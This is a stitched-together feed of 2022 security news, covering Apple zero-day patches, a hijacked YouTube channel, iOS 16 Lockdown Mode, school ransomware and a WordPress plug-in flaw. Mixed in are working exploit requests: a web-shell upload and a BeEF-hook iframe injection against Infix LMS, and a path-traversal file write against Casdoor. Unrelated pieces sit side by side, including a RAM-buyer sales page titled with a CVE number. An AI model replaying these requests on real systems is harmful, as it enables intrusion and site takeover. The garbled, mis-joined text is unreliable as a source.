Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild.
The issue, assigned the identifier CVE-2022-32917, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges.
"Apple is aware of a report that this issue may

Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild.

The issue, assigned the identifier **CVE-2022-32917**, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges.

"Apple is aware of a report that this issue may have been actively exploited," the iPhone maker acknowledged in a brief statement, adding it resolved the bug with improved bound checks.

An anonymous researcher has been credited with reporting the shortcoming. It's worth noting that CVE-2022-32917 is also the second Kernel related zero-day flaw that Apple has remediated in less than a month.

Patches are available in versions iOS 15.7, iPadOS 15.7, iOS 16, macOS Big Sur 11.7, and macOS Monterey 12.6. The iOS and iPadOS updates cover iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

With the latest fixes, Apple has addressed seven actively exploited zero-day flaws and one publicly-known zero-day vulnerability since the start of the year -

*   **CVE-2022-22587** (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-22594** (WebKit Storage) - A website may be able to track sensitive user information (publicly known but not actively exploited)
*   **CVE-2022-22620** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-22674** (Intel Graphics Driver) – An application may be able to read kernel memory
*   **CVE-2022-22675** (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32893** (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-32894** (Kernel) - An application may be able to execute arbitrary code with kernel privileges

Besides CVE-2022-32917, Apple has plugged 10 security holes in iOS 16, spanning Contacts, Kernel Maps, MediaLibrary, Safari, and WebKit. The iOS 16 update is also notable for incorporating a new Lockdown Mode that's designed to make zero-click attacks harder.

iOS further introduces a feature called Rapid Security Response that makes it possible for users to automatically install security fixes on iOS devices without a full operating system update.

"Rapid Security Responses deliver important security improvements more quickly, before they become part of other improvements in a future software update," Apple said in a revised support document published on Monday.

Lastly, iOS 16 also brings support for passkeys in the Safari web browser, a passwordless sign-in mechanism that allows users to log in to websites and services by authenticating via Touch ID or Face ID.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases iOS and macOS Updates to Patch Actively Exploited Zero-Day Flaw

By Waqas
Scuba Jake, whose real name is Jake Koehler, had his YouTube channel "DALLMYD" with 13 million subscribers hacked to steal 1.01 BTC.
This is a post from HackRead.com Read the original post: Popular YouTuber Scuba Jake’s channel hacked to run crypto scam

YouTube is frequently targeted in hacks especially to carry out **crypto scams**. The severity of crypto scams on YouTube can be quantified by the fact that in July 2020, Apple co-founder **Steve Wozniak ended up suing** Google and YouTube over Bitcoin giveaway scams being carried out in his name.

Now, another viral YouTuber Jake Koehler (aka Scuba Jake) has suffered a similar hack in which his channel “**DALLMYD**” was compromised to run a crypto scam and steal funds from his subscribers.

It is worth noting that Jake’s channel has more than 13 million subscribers and boasts 1.75 billion views since its creation in 2011. The American YouTuber is known for uploading scuba-diving videos where he goes underwater on treasure hunts and finds/returns lost items including smartphones, gadgets, and jewelry.

Archive video of Scuba Jake’s YouTube channel

According to the financial news and crypto analysis blog **Finbold**, the hacking occurred on September 9th, 2022. Reportedly, crypto scammers hijacked the channel and tried to defraud innocent followers of Scuba Jake in a **fake giveaway scheme** involving cryptocurrencies Bitcoin and Ethereum.

What’s worse, apparently scammers managed to steal 1.01 BTC (around $21,000). This analysis was based on the QR codes scammers shared with users to scan before sending crypto.

On the other hand, a look at Blockchain.com confirms that the **scammers’ Bitcoin wallet** shared with users received four transactions, and since its creation, it has received around 1.0107 BTC. That’s the same amount the scammers stole from Jake’s subscribers, but it may be higher because the scammers might have used multiple wallets during the live stream. It is worth noting that no transaction was made in the **Ethereum** wallet.

Scammers also changed Jake’s channel name to MicroStrategy US to replicate the firm MicroStrategy, a USA’s crypto-friendly business intelligence firm. Scammers hosted two live streams of an old video showcasing ex-CEO of the company and Bitcoin enthusiast Michael Saylor.

The scammers deceived unsuspecting subscribers of Jake into sending cryptocurrency and receiving a prize or higher reward from Saylor. They targeted the channel because of Jake’s massive following.

Although Jake has already confirmed the hack on his Instagram story but at the time of writing his channel was unavailable to viewers. A search for his YouTube channel shows video collaboration with other YouTubers while his channel is nowhere to be found on YouTube.

1.  **Botnet found using YouTube to illegally mine cryptocurrency**
2.  **Popular YouTube gaming channel hacked to run crypto scam**
3.  **YouTube deletes 2 million channels and 51 million videos over scams**
4.  **YouTube scammers impersonated Elon Musk, SpaceX; stole $150k in BTC**
5.  **British Military’s Twitter and YouTube Accounts Hacked to Scam Crypto Users**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Popular YouTuber Scuba Jake’s channel hacked to run crypto scam

Infix LMS version 4.3.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Infix LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608# Version: 4.3.0# Tested on Ubuntu 18.04sign up as teachergo profile page and try to upload profile picwith bypass name restriction on post request with burp or etc, upload b374k with burp or else -------Request-----------POST /profile-update HTTP/1.1Host: localhostContent-Length: 102201Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzjX6L4V6hVC4KIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/profile-settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3DConnection: close------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="_token"0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="name"Teacher------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="email"teacher@infixedu.com------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="phone"01711223345------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="country"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="city"1374------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="zip"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="currency"112------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="language"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="facebook"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="twitter"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="linkedin"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="instagram"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="short_details"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="about"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="image"; filename="shell.php.jpg.php"Content-Type: image------b374kshell content-----------WebKitFormBoundaryzjX6L4V6hVC4KIEC--

Infix LMS 4.3.0 Shell Upload

Infix LMS version 4.3.0 suffers from an iframe injection vulnerability.

# Exploit Title: Infix LMS - Learning Management System IFRAME Injection 
# Exploit Author: th3d1gger 
# Vendor Homepage: https://codecanyon.net 
# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608 
# Version: 4.3.0 
# Tested on Ubuntu 18.04 
sign up as teacher 
go course page and try to add course or edit 
with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field

--request-- 
POST /admin/course/updateCourse HTTP/1.1 
Host: localhost 
Content-Length: 3855 
Cache-Control: max-age=0 
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" 
sec-ch-ua-mobile: ?0 
sec-ch-ua-platform: "Linux" 
Upgrade-Insecure-Requests: 1 
Origin: http://localhost 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydcMGShie2VwdqOn2 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Sec-Fetch-Site: same-origin 
Sec-Fetch-Mode: navigate 
Sec-Fetch-User: ?1 
Sec-Fetch-Dest: document 
Referer: http://localhost/admin/course/course-details/7?type=courseDetails 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 
Cookie: XSRF-TOKEN=eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D 
Connection: close

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="_token"

0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="type"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="drip"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="title"

Introduction to Programming and App Development 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="id"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="requirements"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="about"

 <iframe src="http://192.168.1.18:3000/uploads/test.html"><div> </div> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text 
 ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="outcomes"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="category"

4 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="sub_category"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="mode_of_delivery"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="quiz"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="level"

2 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="language"

19 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="duration"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="complete_order"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="price"

20 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="is_discount"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="discount_price"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="host"

Youtube 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="trailer_link"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vimeo"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vdocipher"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="file"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="scope"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="image"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundarydcMGShie2VwdqOn2--

Infix LMS 4.3.0 IFRAME Injection

Safety Check and Lockdown Mode give people in vulnerable situations ways to quarantine themselves from acute risks.

Apple has long said that it offers software that is secure and private enough for all users by default, without special tiers or paid services. As digital threats to its users expand, though, the company has had to evolve this philosophy. And today's release of iOS 16 comes with two new features meant to help protect people facing very specific crises in their lives.

Safety Check and Lockdown Mode are very different tools, but Apple has built them both into its latest mobile operating system release as lifelines for digital worst-case scenarios. 

Apple designed Safety Check as a feature for users who are at risk for, or currently experiencing, domestic abuse. The tool centralizes a number of controls in one place to make it easier for users to manage and revoke access to their location data and reset privacy-related permissions. Lockdown Mode, on the other hand, is meant for users who potentially face targeted spyware attacks and aggressive state-backed hacking. The feature comprehensively restricts any nonessential iOS features so there are as few potential points of entry to a device as possible. As more governments and repressive entities around the world have begun purchasing powerful commodity spyware to target individuals of particular importance or interest, iOS's general security defenses haven't been able to keep pace with these specialized threats.

“I do think that things like Lockdown Mode and Safety Check are good,” says Thomas Reed, director of Mac and mobile platforms at the antivirus maker Malwarebytes. “People criticize Apple for not opening up iOS enough, and those folks would say this is just a token effort to silence critics. I don’t agree, though. For the nation-state-type stuff and risks users may be facing from people close to them, I think these new features will absolutely help within the paradigm of Apple’s current security model.”

Many mobile security researchers, including Reed, see major tradeoffs in Apple's philosophical approach to securing iOS. The mobile operating system is extremely locked down and can't be monitored for suspicious activity the way other operating systems can be. The benefit of this is that attackers are boxed out in the same way defenders are, but when hackers find and exploit a vulnerability, they can do it without being seen. Given this premise, the creation of purpose-built protective tools like Safety Check and Lockdown Mode is not just a logical progression but a necessary one.

“The more Apple locks down iOS to improve end user security, the harder it becomes for the security research community to investigate and identify vulnerabilities,” says Amanda Gorton, CEO of the of the mobile virtualization company Corellium. “I think it's commendable that Apple is taking measures to address security threats that are only ever likely to impact a tiny fraction of its user base.”

For iOS users dealing with harassment or abuse at home, Safety Check offers a few options to take back some digital control. For a user who has concerns and wants to rein in the access other people may have to their location information and other data, Safety Check offers a tool called Manage Sharing & Access. This tool details the people and apps that have access to different information, like who is connected through Find My Friends or which apps can use a device's microphone. It also includes walkthroughs so users can review their security settings. The Emergency Reset feature, meanwhile, is like a panic button if you think someone has gotten access to your device and set it so you are easier to track and surveil. Emergency Reset can revoke all access at once, resetting privacy permissions, signing you out of iCloud on all other devices, and limiting where your account can send and receive texts through Messages.

Apple says that “Safety Check can be helpful to users whose personal safety is at risk from domestic or intimate partner violence by quickly removing all access they’ve granted to others." 

To access the features, go to **Settings**, then **Privacy & Security**, and then **Safety Check**. 

Lockdown Mode is different in the sense that it is almost a parallel universe that users can move their iPhones into where luxuries like link previews in Messages, shared albums in Photos, and FaceTime calls from phone numbers and accounts you haven't called before are all blocked. In exchange, the goal is to make it much more difficult for commercial spyware vendors to discover and take advantage of complex exploit chains that combine vulnerabilities in multiple iOS features to take control of devices.

“While the vast majority of users will never be the victims of highly targeted cyberattacks, we will work tirelessly to protect the small number of users who are,” Apple’s head of security engineering and architecture, Ivan Krstić, said when the feature was announced in July. “That includes continuing to design defenses specifically for these users.”

Turn on Lockdown Mode in iOS 16 by going to **Settings**, then **Privacy and Security**, then **Lockdown Mode**.

Though Apple doesn't intend either feature to become a hot trend for most users, the fact is that the tools may find audiences and use cases beyond their intended populations. And when it comes to Lockdown Mode, in particular, one can only imagine what strategies researchers and attackers alike may develop to attack even this most hardened version of commercial iOS. But both features offer new and expanded opportunities for users to make it more difficult for adversaries of all sorts to achieve the level of access they seek. And both make it easier for Apple to fix new vulnerabilities and workarounds that arise more easily. Rather than having to make substantial changes, Apple can simply refine Safety Check and Lockdown Mode to address the latest concern.

“There’s been some debate about whether Lockdown Mode will actually prevent spyware attacks like infections from NSO Group's Pegasus,” Malwarebytes Reed says. “It’s possible it won’t prevent all possible means of infection, but it reduces the attack surfaces and makes it harder for attackers. As much as I’d personally like to be able to have greater visibility into iOS, I think Apple’s doing the right thing."

Apple's App Store, though, is one domain that Lockdown Mode and Safety Check don’t address. Researchers have found malicious apps that got approved for the App Store in the past, and as other avenues are closed off to attackers, they may increasingly refine their techniques for developing stealthily malicious apps in an attempt to make up ground. 

“The specific elements of Lockdown Mode give us insight into what Apple sees as the most common attack vectors on an iPhone today,” Corellium's Gorton says. But “Lockdown Mode doesn't seem to restrict access to third-party apps. It's possible that as Apple limits the attack surface for native features, the attack focus may increasingly shift to apps from the App Store. That could be problematic for a couple of reasons. One, we know these these apps undergo relatively limited review before making it to the App Store. And two, this would increase the burden of security mitigations on third-party developers, but the locked-down nature of iOS makes it increasingly difficult for app developers to adequately test the security of their own apps.”

Apple's changing philosophy on specialized security and privacy protections is a welcome step, but it may apply its own evolutionary pressures to the iOS security field that move attackers' focus without dampening their zeal.

iOS 16 Has Two New Security Features for Worst-Case Scenarios

An issue in Micro-Star International MSI Feature Navigator v1.0.1808.0901 allows attackers to download arbitrary files regardless of file type or size.

We buy ram memory of all major brands like Crucial, SanDisk, Kingston, Dell, Apple, HP and other major brands. Branded RAM gives you higher value. If your RAM memory still have sticker on that, then you are at luck, we can provide you better pricing. We accept DDR2 and DDR3 types of RAM Memory. We also accept RAM memory from old Mac computer and laptops. You can sell us RAM in bulk quantity as well. We are buying server RAM memory also. Just fill the form on bottom of this page and we will get back to you as soon as possible.

**Why you choose Microstar?**

*   We are eBay Power Seller.
*   We are in this industry more than 3 decades.
*   We pay you most of your RAM memory.
*   We buy RAM memory from computer, laptop and server of all types.
*   We process your payment fast.

**We accept DDR2 and DDR3 RAM Memory of following brands:**

Oracle-Sun Microsystems

Samsung

Dell

Crucial

Micron

IBM

Hynix

HP

Edge

Corsair

Cisco

All other brands

**Sell Hard Drives, Sell used hard drives for cash**

Convert your excess storage in to cash by selling your old hard disk drives. We buy old used or refurbished hard drives. We accept HDDs and SSDs from computer, laptop, server etc.

Mostly we buy all size 2.5” and 3.5” storage types of hard disk drives and solid state drives. We buy hard disk drives of all major brands like Samsung, GMBT, Western Digital, Dell, IBM, Seagate etc.

**Microstar**

9216 Lazy Lane, Tampa Florida 33614.  
Email: microstar@verizon.net  
Store hours are by appointment only.

**President**

Hello, I am Ray Margarit and I am the President of Microstar. I am probably at the office now. Please call me at: (813) 667-1000.

**Testing**

We have very efficient & strenuous testing methods. We are Department of Defense certified in removing data from hard drives.

We are ALWAYS looking to buy large quantities of used software, used CPU chips, used memory chips, used hard drives, used monitors, used cdroms, used memory ram, used printers, used motherboards, used sdram, used video cards, such brands like; Pentium, AMD, Seagate, Western Digital, Dell, IBM, HP, Intel and others, as well as other computer related items which companies could sell after upgrades. We actually buy and sell all used electronic equipment.

**We are an eBay PowerSeller, See for yourself**

The Microstar Ebay store offers top quality brands in Memory, CPUs, Hard Drives, and other computer components and peripherals. You can sell RAM, Memory, Hard Disks, Processors, Motherboards and other computer scraps in bulk as well. We sell very fast as we are eBay Power Seller.

**Seller Form. We Buy. Sell to us!**

Please type in a description of the items that you would like to sell and the total price for them. If we are interested, we will respond with an e-mail message.

CVE-2022-34110: Sell Memory, Sell RAM, Sell Hard Drives

Plus: Albania cuts ties with Iran, claims of a TikTok data breach that didn’t happen, and much more.

Russia’s full-scale invasion of Ukraine hasn’t gone to Vladimir Putin’s plan: Its troops have suffered devastating losses, failed to capture key Ukrainian cities, and been pushed back toward Russia. However, domestically, the Kremlin has succeeded in further suppressing its citizens—including blocking independent news media and other access to impartial information. Now, a new tool lets people in Russia access websites the Kremlin has blocked, giving them access to news that’s not dictated by the state’s propaganda machine.

The Biden administration is reportedly readying itself to take action against TikTok, following years of suggestions that the Chinese-owned app is a threat to national security. This week we looked at the problem with TikTok: that lawmakers can’t decide on what threat, if any, the app really poses.

Elsewhere, Apple revealed the new iPhone 14. Alongside this, it announced that iOS 16 will be available for people to download from September 12. This means Apple’s new passkey technology, which eliminates the need for passwords, will be available to millions of people. Here’s everything you need to know about Apple’s passkeys.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

With more than 400,000 students ranging from kindergarten to 12th grade, the Los Angeles Unified School District is one of the largest school districts in the US. On September 6, the district became the latest to be targeted by ransomware. In a statement published online, the district’s administrators said it had detected “unusual activity” within its networks, saying it had been targeted by ransomware; despite the attack, students have been able to attend school.

The attack prompted a large response from officials, with the FBI and Department of Homeland Security assisting local law enforcement. Students and staff have lost access to their email systems, local reports say. It is also unclear, according to reports, whether students' information, including disciplinary records and assessments, was accessed by the attackers. The school district says that students and employees must reset their passwords to their school accounts while physically attending school district sites. “The District has staggered password reset access to minimize congestion from simultaneous users accessing the website,” officials said in a statement.

The Vice Society ransomware group has claimed responsibility for the attack. Following the incident, the Cybersecurity and Infrastructure Security Agency (CISA) and other partners published a warning about Vice Society, saying it has been “disproportionately targeting the education sector.” The Los Angeles attack is the latest against educational institutions: According to a report by security firm Sophos based on a survey of 499 respondents, 56 percent of lower education and 64 percent of higher education organizations were hit by ransomware in the past year, a “considerable increase” from the previous year.

Back in July, the government websites of Albania were knocked offline. Last month, security company Mandiant researchers revealed that Iranian hackers, working on behalf of Tehran, were likely to be behind the attacks, which took out public services for hours. “These are disruptive attacks, which affect the lives of everyday Albanians who live within the NATO alliance,” John Hultquist, Mandiant’s vice president of intelligence, told WIRED when it published its findings.

This week, the government of Albanian took the unprecedented step to cut diplomatic ties with Iran, accusing it of launching the cyberattack. The country also ordered Iranian embassy staff to leave the country. “The deep investigation put at our disposal undeniable evidence that the cyberattack against our country was orchestrated and sponsored by the Islamic Republic of Iran which had involved four groups for the attack on Albania,” prime minister Edi Rama said in a statement. (Microsoft conducted the investigation for the Albanian government.)

Hackers Target Los Angeles School District With Ransomware

Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider\_storage\_local\_file\_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider\_storage\_local\_file\_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor\_session\_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: \*/\*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
\------WebKitFormBoundaryUPAwhIoXMrbemuJM--

Then we can find out that the problem does occur by following this link。  
https://door.casdoor.com/flag.html

CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

The critical flaw in BackupBuddy is one of thousands of security issues reported in recent years in products that WordPress sites use to extend functionality.

Attackers are actively exploiting a critical vulnerability in BackupBuddy, a WordPress plug-in that an estimated 140,000 websites are using to back up their installations.

The vulnerability allows attackers to read and download arbitrary files from affected websites, including those containing configuration information and sensitive data such as passwords that can be used for further compromise.

WordPress security vendor Wordfence reported observing attacks targeting the flaw beginning Aug. 26, and said it has blocked close to 5 million attacks since then. The plug-in's developer, iThemes, issued a patch for the flaw on Sept. 2, more than one week after the attacks began. That raises the possibility that at least some WordPress sites using the software were compromised before a fix became available for the vulnerability.

**A Directory Traversal Bug**

In a statement on its website, iThemes described the directory traversal vulnerability as impacting websites running BackupBuddy versions 8.5.8.0 through 8.7.4.1. It urged users of the plug-in to immediately update to BackupBuddy version 8.75, even if they are not currently using a vulnerable version of the plug-in.

"This vulnerability could allow an attacker to view the contents of any file on your server that can be read by your WordPress installation," the plug-in maker warned.

iThemes' alerts provided guidance on how site operators can determine if their website has been compromised and steps they can take to restore security. These measures included resetting the database password, changing their WordPress salts, and rotating API keys and other secrets in their site-configuration file.

Wordfence said it had seen attackers using the flaw to try to retrieve "sensitive files such as the /wp-config.php and /etc/passwd file which can be used to further compromise a victim."

**WordPress Plug-in Security: An Endemic Problem**

The BackupBuddy flaw is just one of thousands of flaws that have been disclosed in WordPress environments — almost all of them involving plug-ins — in recent years.

In a report earlier this year, iThemes said it identified a total of 1,628 disclosed WordPress vulnerabilities in 2021 -- and more than 97% of them impacted plug-ins. Nearly half (47.1%) were rated as being of high to critical severity. And troublingly, 23.2% of vulnerable plug-in had no known fix.

A quick scan of the National Vulnerability Database (NVD) by Dark Reading showed that several dozen vulnerabilities impacting WordPress sites have been disclosed so far in the first week of September alone.

